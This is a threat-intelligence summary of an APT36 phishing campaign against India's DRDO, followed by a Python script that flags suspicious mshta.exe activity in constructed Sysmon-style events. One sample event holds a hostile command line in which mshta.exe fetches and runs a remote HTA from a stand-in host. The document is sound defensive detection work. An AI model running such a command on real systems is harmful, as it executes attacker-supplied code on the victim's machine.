APT36 Targets Indian Defense Research And Development Organization (DRDO)

March 29, 2023

A recent APT36 campaign began with a spam email containing a link to a malicious file hosted on a compromised website. The lure used mshta.exe to connect to a specific URL and execute a Microsoft HTML Application (HTA) file, which decoded and decompressed a PowerPoint file into a temporary folder. The PowerPoint file then loaded a DLL into memory and invoked it through the .NET DynamicInvoke method, so the loader never had to write the DLL to disk as a separate file. The final payloads were remote access trojans used to exfiltrate sensitive information, including clipboard data, screenshots, keystrokes, and listings of files and folders.
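The mshta.exe stage is the most visible point in this chain for defenders: a signed Windows binary fetching an HTA from a remote URL, launched by a mail or Office client, and then writing an Office document into the user's Temp folder. The script below is an added example, not code from the original report, showing how those observations translate into detection logic over Sysmon-style process-creation (Event ID 1) and file-creation (Event ID 11) records. The sample events, hostnames, user paths and field names are constructed for illustration and do not come from the campaign.

```python
import json
import re
from typing import Dict, List

# Constructed Sysmon-style events (not real telemetry). Event 0 mirrors the
# described chain: Outlook -> mshta.exe -> remote HTA. Events 2 and 3 are
# benign controls that must not fire.
SAMPLE_EVENTS = "\n".join([
    json.dumps({"EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe",
                "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
                "CommandLine": "mshta.exe https://compromised.example/assets/update.hta"}),
    json.dumps({"EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe",
                "ParentImage": "C:\\Windows\\explorer.exe",
                "CommandLine": "mshta.exe C:\\Users\\alice\\AppData\\Local\\Temp\\invoice.hta"}),
    json.dumps({"EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe",
                "ParentImage": "C:\\Windows\\explorer.exe",
                "CommandLine": "\"C:\\Windows\\System32\\mshta.exe\" \"C:\\Tools\\local_admin_panel.hta\""}),
    json.dumps({"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe",
                "ParentImage": "C:\\Windows\\explorer.exe",
                "CommandLine": "notepad.exe https://example.org/readme.txt"}),
    json.dumps({"EventID": 11, "Image": "C:\\Windows\\System32\\mshta.exe",
                "TargetFilename": "C:\\Users\\alice\\AppData\\Local\\Temp\\presentation.pptx"}),
])

# Remote content passed to mshta.exe on the command line.
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
# Parents that should not normally spawn mshta.exe.
OFFICE_PARENTS = ("outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe")
# User-writable drop locations seen in the described chain (assumed set).
USER_DROP_DIRS = ("\\appdata\\local\\temp\\", "\\downloads\\")
# File types the HTA stage wrote to disk or loaded next.
STAGE_EXTENSIONS = (".ppt", ".pptx", ".pps", ".ppsx", ".dll")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> List[Dict]:
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect_mshta(event: Dict) -> List[str]:
    """Return the detection names that fire for one event (empty list if none)."""
    findings: List[str] = []
    if basename(event.get("Image", "")) != "mshta.exe":
        return findings
    if event.get("EventID") == 1:
        cmd = event.get("CommandLine", "")
        if URL_RE.search(cmd):
            findings.append("mshta_remote_hta")
        if basename(event.get("ParentImage", "")) in OFFICE_PARENTS:
            findings.append("mshta_spawned_by_office")
        if any(d in cmd.lower() for d in USER_DROP_DIRS):
            findings.append("mshta_hta_from_temp")
    elif event.get("EventID") == 11:
        target = event.get("TargetFilename", "").lower()
        if target.endswith(STAGE_EXTENSIONS) and any(d in target for d in USER_DROP_DIRS):
            findings.append("mshta_dropped_office_or_dll_in_temp")
    return findings


def scan(text: str) -> List[Dict]:
    """Run detect_mshta over every event and keep only the ones that fired."""
    hits = []
    for index, event in enumerate(parse_events(text)):
        findings = detect_mshta(event)
        if findings:
            hits.append({"index": index, "image": event.get("Image", ""), "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["index"], hit["image"], ", ".join(hit["findings"]))
```

Event 0 trips two rules at once (remote HTA plus an Office parent), which is the combination worth paging on; the lone `mshta_hta_from_temp` hit on event 1 is lower confidence and is best correlated with a later Event ID 11 from the same process. A plain local HTA under a tools directory (event 2) and a URL on a non-mshta command line (event 3) produce nothing, so the rules do not fire on every HTA or every URL.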